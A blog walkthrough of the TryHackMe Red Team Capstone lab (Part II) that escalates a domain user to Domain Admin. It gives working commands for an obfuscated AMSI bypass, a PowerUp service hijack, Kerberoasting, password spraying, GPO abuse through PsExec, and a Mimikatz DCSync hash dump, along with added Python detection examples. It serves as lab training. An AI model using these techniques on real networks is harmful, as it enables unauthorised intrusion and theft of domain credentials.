TryHackMe Red Team Capstone Walkthrough, Part II: Escalation to Domain Admin

8 min read · Sep 7, 2025

TL;DR walkthrough of the Red Team Capstone network on TryHackMe. This is Part II: Escalation to Domain Admin.

THM Walkthroughs:

A full list of our TryHackMe walkthroughs and cheatsheets is here.

Our Red Team Capstone Walkthrough Series

There are four parts to this walkthrough of the Red Team Capstone due to the sheer size of the network:

I will add a link to the last part once I post it. Currently it only exists in raw notes and screenshots.

Background

We left off Part I: Initial Access with access to a domain workstation as a Domain User.

xfreerdp /u:mohammad.ahmed /p:'Password1!' +clipboard /dynamic-resolution /cert:ignore /v:10.200.89.21 /drive:share,/home/kali/Downloads/RedTeam

On an admin note, Kali can only reach .21 and .22 directly. These are named WRK1 and WRK2 on the corp.thereserve.loc domain. This really isn’t an issue though. I simply put my Windows tools like Mimikatz and Rubeus in the RedTeam folder and then mapped it as a share drive via xfreerdp.

I could then RDP to subsequent VMs from my foothold on .21 and simply copy/paste to and from them from the .21 VM.

I did not screw around with setting up a tunnel or a forwarder on .21, my foothold VM. There was no need to.

If you were putting the flags in as you go then your diagram will look like this.


Please note that I am going to leave out all the tangents I went off on that did not lead to Domain Admin. For example I dumped credentials on WRK1, WRK2, and Server1 once I compromised them. Just know that I’m not smart, clever, or lucky enough to go through escalation to Domain Admin as succinctly as I’m showing in this walkthrough. I’m merely leaving out the dead ends I took along the way and only describing the steps that were applicable.

Getting local admin rights

wmic computersystem get domain

This confirms that the domain is corp.thereserve.loc. Note that most of the VMs only respond to their FQDN or IP address.

crackmapexec smb IPs.txt -u mohammad.ahmed -p 'Password1!' -d corp.thereserve.loc --continue-on-success

We have RDP access to .21 & .22. We are in the helpdesk group. We don’t have local admin on either VM. This just will not do; we need local admin so we can enable Windows features, disable Defender, and run tools like Rubeus on our foothold system.

I copy/pasted the AMSI bypass

S`eT-It`em ( 'V'+'aR' +  'IA' + (("{1}{0}"-f'1','blE:')+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),(("{0}{1}" -f '.M','an')+'age'+'men'+'t.'),('u'+'to'+("{0}{2}{1}" -f 'ma','.','tion')),'s',(("{1}{0}"-f 't','Sys')+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+("{0}{1}" -f 'ni','tF')+("{1}{0}"-f 'ile','a'))  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+("{1}{0}" -f'ubl','P')+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

and then ran PowerUp.ps1 directly from the Kali share drive. This works even with Defender enabled as it doesn’t write to disk on the VM. The easy way to do this is to navigate to the share drive, Shift + right click, and ‘Open PowerShell window here’.

. .\PowerUp.ps1
Write-ServiceBinary -Name 'Backup' -Path "C:\Backup Service\Full Backup\backup.exe" -Command "net user john Password123! /add && timeout /t 5 && net localgroup Administrators john /add"
net start backup

You may have to restart the VM or just wait for THM’s timer to run out, or you may get lucky and all you have to do is log out and then RDP in as john. I used john’s local admin account to add corp\mohammad.ahmed to Administrators on WRK1, aka .21. This is because while having local admin is great, having a Domain User who is also a local admin is better when it comes to running tools like Rubeus.

Domain enumeration

I do have one small complaint with the Red Team Capstone: none of the VMs except the DCs had RSAT enabled. Even the DC didn’t have the AD PowerShell module added. I was able to enable these features of course once I gained local admin, but it’s annoying, particularly given a less than stellar connection speed and performance on THM VMs.

Those who have worked helpdesk like I have probably know to run appwiz.cpl -> turn Windows features on or off -> Manage -> Add roles or features -> hit Next 4x -> and check the Features you want as shown below.


Sure, I could have used PowerShell to add them, but that command isn’t in my AD cheat sheet yet. I’ll have to add it later. At any rate, I’m ok with using the GUI for one-offs like this.

Once RSAT is enabled we can run dsa.msc and easily see all the computers, users, OUs, etc in the domain.

We can also turn off Defender, run SharpHound.exe on the Kali share drive, and collect data for BloodHound.

I ran BloodHound on Kali. I posted a howto on setting up BloodHound on Windows and Kali here if you don’t already have it set up.

./neo4j-desktop-1.6.0-x86_64.AppImage
bloodhound

Lateral movement

BloodHound identified multiple accounts that we can Kerberoast, so let’s try Kerberoasting.

Normally I would run this attack from Kali using impacket, but remember that Kali can’t directly access the CORP domain’s DC.

/usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request corp.thereserve.loc/mohammad.ahmed:Password1\! -dc-ip 10.200.89.102 -outputfile /home/kali/Downloads/RedTeam/hashes.txt

Hence I copy/pasted Rubeus.exe to the .21 VM and used it to Kerberoast.

.\Rubeus.exe kerberoast /outfile:hashes.txt

I then simply copy/pasted hashes.txt to Kali using the xfreerdp share drive. This is why using xfreerdp to map a share drive is so handy.

I used john on Kali to try cracking the hashes and got one hit.

john --format=krb5tgs hashes.txt --wordlist=/home/kali/rockyou.txt
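As an added defender-side example, not from the original post: the same Kerberoast activity as it appears in the DC’s Security log. Event ID 4769 records where one account pulls RC4-HMAC (0x17) service tickets for several user SPNs are the classic tell. The records are constructed; svcbackups, svcweb and constructed.user are made-up names.

```python
"""Flag likely Kerberoasting in Windows Security Event ID 4769 (TGS request) data.

Rubeus' kerberoast asks the DC for a service ticket for every user account
with an SPN and requests RC4-HMAC (ticket encryption type 0x17) so the ticket
can be cracked offline with john. On the defending side the tell is one
account pulling RC4 tickets for many different user-owned services.
Records below are constructed samples, not data from the lab.
"""
from collections import defaultdict

RC4_HMAC = "0x17"

# (requesting account, service name, ticket encryption type, client address)
SAMPLE_4769 = [
    ("mohammad.ahmed@CORP", "krbtgt", "0x12", "10.200.89.21"),         # TGT renewal, AES
    ("mohammad.ahmed@CORP", "WRK2$", "0x12", "10.200.89.21"),          # machine SPN, AES
    ("mohammad.ahmed@CORP", "svcscanning", "0x17", "10.200.89.21"),    # RC4 to a user SPN
    ("mohammad.ahmed@CORP", "svcbackups", "0x17", "10.200.89.21"),     # constructed account
    ("mohammad.ahmed@CORP", "svcweb", "0x17", "10.200.89.21"),         # constructed account
    ("constructed.user@CORP", "svcscanning", "0x12", "10.200.89.22"),  # normal AES request
]


def rc4_user_spn_requests(records):
    """Return (account, service, client) for RC4 tickets to user SPNs.

    krbtgt and computer accounts (names ending in '$') are excluded: they are
    not what a Kerberoaster targets and would only add noise.
    """
    hits = []
    for account, service, etype, client in records:
        if etype.lower() != RC4_HMAC:
            continue
        if service.lower() == "krbtgt" or service.endswith("$"):
            continue
        hits.append((account, service, client))
    return hits


def kerberoast_suspects(records, min_services=3):
    """Map each account to the sorted user services it pulled RC4 tickets for,
    keeping only accounts at or above min_services distinct targets."""
    per_account = defaultdict(set)
    for account, service, _client in rc4_user_spn_requests(records):
        per_account[account].add(service)
    return {acct: sorted(svcs) for acct, svcs in per_account.items()
            if len(svcs) >= min_services}


if __name__ == "__main__":
    for acct, svcs in kerberoast_suspects(SAMPLE_4769).items():
        print(f"possible Kerberoast by {acct}: {', '.join(svcs)}")
```

Service accounts restricted to AES via msDS-SupportedEncryptionTypes, or replaced by gMSAs with long random passwords, take the offline cracking step off the table.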

How do we know what user account ‘Password1!’ belongs to though? Easy, copy/paste the usernames with SPNs to users.txt and spray that password.

crackmapexec smb 10.200.89.21 -U users.txt -p 'Password1!'

Nice, we have more credentials:

SVCSCANNING \ Password1!

Normally I would use crackmapexec on Kali to find what additional systems svcscanning has rights to, but remember that Kali can only access .21 & .22. There are only two other VMs in this domain besides the DC though, so I simply tried to RDP to them from .21 as corp\svcscanning.

It turns out that svcscanning is already a local admin on both .31 and .32, aka Server1 and Server2.

BloodHound

I went back to Kali and marked those VMs as owned in BloodHound … and what do we find?

Holy ****, we’re about to p0wn this thing

Look at that, Server1 and Server2 both have an escalation path directly to Domain Admin. BloodHound showed a more convoluted way of doing so than required, but then again maybe I just need to update my Kali VM to the latest version.

The gist of this escalation path is:

  • The computer accounts themselves were delegated GenericWrite on a GPO that is applied to the Domain Controllers OU.
  • This means that the computers themselves can modify that GPO and make changes directly on the DCs.
  • This means that anyone who has local admin access to Server1 or Server2 can change that GPO.
  • In other words, anyone who has local admin on Server1 or Server2 is one small step away from making themselves a Domain Admin.

Escalation to Domain Admin

I copy/pasted PSTools to Server1 & unzipped them. This is trivial as I had my share drive with tools mapped on .21 and I was then RDPed from .21 into .31. I didn’t even have to disable Defender as PSTools was originally developed by Sysinternals, who were later bought by Microsoft. In other words the PsTools Suite is a legitimate Microsoft tool set that we are simply abusing. You can download it from Microsoft here if you don’t already have it handy.

I ran appwiz.cpl and added the Group Policy Management feature to Server1 as described earlier.

I then ran the Group Policy Management Console as the computer account itself rather than as my user account, svcscanning, via PsExec, part of PSTools.

.\PsExec.exe -s -i mmc.exe gpmc.msc

I then simply navigated to

Computer Configuration \ Policies \ Windows Settings \ Security Settings \ Restricted Groups

and added the group corp\Domain Admins. I then added the two users I had compromised, corp\mohammad.ahmed and corp\svcscanning, to Domain Admins.

That’s it. I went and played video games or read the news, I don’t remember now, while I waited for Group Policy to update on the DC: CORPDC.corp.thereserve.loc. Ironically, if the time runs out on the room and the network shuts down it helps us, as Computer Configuration settings in a GPO are applied at system startup. Simply hit Start on the Red Team Capstone page to fire the network back up and bam, our GPO takes effect.
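As an added defender-side example, not from the original post: two checks against the path described above, one auditing GPO ACEs for computer accounts holding write-class rights (the misconfiguration that let Server1/Server2 edit a GPO linked to the Domain Controllers OU) and one scanning Security Event ID 5136 for GPO objects edited by a computer account. All sample data is constructed; ‘DC Baseline GPO’ and gpo.admin are made-up names, and the 5136 check assumes Directory Service Changes auditing with a SACL on CN=Policies,CN=System.

```python
"""Defensive checks for the GPO-write escalation path used in this walkthrough.

Constructed sample data throughout (nothing here is pulled from the lab).
Check 1 audits GPO ACEs for computer accounts (names ending in '$') that hold
write-class rights over a GPO object. Check 2 scans Security Event ID 5136
(Directory Service Changes) for a groupPolicyContainer modified by a computer
account; that event only exists if 'Audit Directory Service Changes' is on
and a SACL covers CN=Policies,CN=System (assumed here).
"""

WRITE_RIGHTS = {"GenericAll", "GenericWrite", "WriteProperty",
                "WriteDacl", "WriteOwner"}

# (GPO display name, trustee, rights as Get-Acl renders them) -- constructed
SAMPLE_GPO_ACES = [
    ("DC Baseline GPO", "CORP\\Domain Admins", "GenericAll"),
    ("DC Baseline GPO", "CORP\\SERVER1$", "GenericWrite"),
    ("DC Baseline GPO", "CORP\\SERVER2$", "ReadProperty, GenericWrite"),
    ("DC Baseline GPO", "CORP\\WRK1$", "ReadProperty, GenericExecute"),
    ("Default Domain Policy", "CORP\\Authenticated Users", "ReadProperty, GenericExecute"),
]

# (subject account, object class, attribute changed) -- constructed 5136 records
SAMPLE_5136 = [
    ("SERVER1$", "groupPolicyContainer", "versionNumber"),
    ("SERVER1$", "groupPolicyContainer", "gPCMachineExtensionNames"),
    ("SERVER1$", "computer", "servicePrincipalName"),       # routine self-update, benign
    ("gpo.admin", "groupPolicyContainer", "versionNumber"),  # a human editing a GPO
]


def computer_accounts_with_gpo_write(aces):
    """Return (gpo, trustee, matched rights) for machine accounts with write rights."""
    findings = []
    for gpo, trustee, rights in aces:
        if not trustee.endswith("$"):
            continue
        matched = sorted({r.strip() for r in rights.split(",")} & WRITE_RIGHTS)
        if matched:
            findings.append((gpo, trustee, matched))
    return findings


def gpo_edits_by_machine(events):
    """Return (account, attribute) for GPO objects modified by a computer account.

    A machine account touching versionNumber or gPCMachineExtensionNames is
    exactly what a Restricted Groups edit made 'as the computer' looks like."""
    return [(acct, attr) for acct, cls, attr in events
            if cls == "groupPolicyContainer" and acct.endswith("$")]
```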

Post compromise

The first thing I did after Group Policy updated and I got Domain Admin was to RDP into CORPDC, .102, turn off Defender, copy/paste Invoke-Mimi.ps1 from the Kali share drive on .21, and

. .\Invoke-Mimi.ps1
Invoke-Mimi -Command '"token::elevate" "privilege::debug" "lsadump::dcsync /dc:CORPDC /domain:corp.thereserve.loc /all"' | Out-File .\AllCorpHashes.txt

I’m showing the full, uncropped screenshot below so everyone can see exactly what I did. I ran it first without thinking to save the output to a file, then needlessly tried to export to CSV, then simply exported to *.txt. You can also see how I’m running Kali in a VM, connected to .21 over xfreerdp, and then RDPed into .102.


I then copy/pasted AllCorpHashes.txt back down to .21 and my Kali share drive. There’s a specific NTLM hash in there that will be critical to the next step in our escalation to Enterprise Admin.

Summary

If you’ve looked at some of the more in-depth howtos I linked to my AD cheat sheet, like this one, then you already know what I did next. Hell, I went back, checked my own howto, and then ran the next escalation in the Red Team Capstone. I say all the time that while I claim that these posts are aimed at sysadmins, auditors, and security folks … if I’m being honest then the intended audience of these posts is myself a year or two down the road. My own howto that I checked to proceed further was written 2 years and 4 months ago.

Well this wraps up Part II of our Red Team Capstone Walkthrough. Join us in Part III where we escalate to Enterprise Admin, explore the other child domain in this forest, find the SWIFT banking application, and get into it.

References

Computer Configuration vs User Configuration in GPOs: https://learn.microsoft.com/en-us/answers/questions/51907/difference-between-computer-and-user-objects-in-ac

Written by Rich

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from auditing or the lab.